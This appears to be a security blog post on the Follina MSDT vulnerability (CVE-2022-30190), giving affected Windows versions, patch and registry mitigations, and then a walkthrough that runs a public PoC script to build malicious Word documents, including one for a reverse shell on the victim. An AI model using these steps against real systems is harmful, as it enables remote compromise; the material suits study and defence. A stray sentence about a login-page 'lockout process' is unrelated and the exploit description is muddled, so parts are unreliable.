A new zero-day vulnerability reported in May 2022 in Microsoft Support Diagnostic Tool (MSDT) that can be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode.
Majors version of Microsoft Windows Desktop and Servers affected are as below:
Microsoft Windows 7
Microsoft Windows 8, 8.1
Microsoft Windows 10, 11
Microsoft Windows Servers 2008, 2012, 2016, 2019, 2022
Confidentiality Impact Complete----total information disclose
Integrity Impact Complete----------total compromise system integrity.
Availability Impact Complete-------total shutdown of the system affected.
Vulnerability type-----------------Execute Code
Mitigation & Workaround:
For Mitigation; the update for this vulnerability is in the June 2022 cumulative Windows Updates. Microsoft strongly recommends that customers install the updates to be fully protected from the vulnerability. People whose systems are configured to receive automatic updates do not need to take any further action.
Microsoft Defender Antivirus (MDAV) - build 1.367.851.0or higher will detect.
To disable the MSDT URL Protocol
Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system
Follow these steps to disable:
- Run Command Prompt as Administrator. - back up the registry key command “reg export. - HKEY_CLASSES_ROOT\ms-msdt filename“. - Execute Command : “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.
Technical Analysis / Exploits:
This section will explain how the lockout process works by testing the login page while also reviewing the source code and then making an attack process.
Download the python script in kali Linux for GitHub repository
- git clone https://github.com/JohnHammond/msdt-follina.git
- cd msdt-follina - python3 follina.py
After running the python script, in your msdt-follina directory, a new word document file will be created with the name “follina.doc”. This file is configured to open a calculator on victims system but this script can do many more thing.
This can be transferred in a windows machines that are vulnerable by any means or exposed by the infrastructure hardening weakness etc.
Upon clicking on the file, will automatically open the calculator application on the victim's window system
While running this python script, you can enter the application name as a parameter, and this python script will create a new document file.
Using the below command, a new file will be created, and if the victim opens this file, the notepad application will automatically open in the victim's system.
- python3 follina.py -c “notepad.exe
Now the most interesting part of this exploit, you can get the reverse shell of the victim's machine using this word document file
Use the below mentioned command to create a new follina.doc file
- python3 follina.py -r 9999
#msdt #remotecodeexecution #cve-2022-30190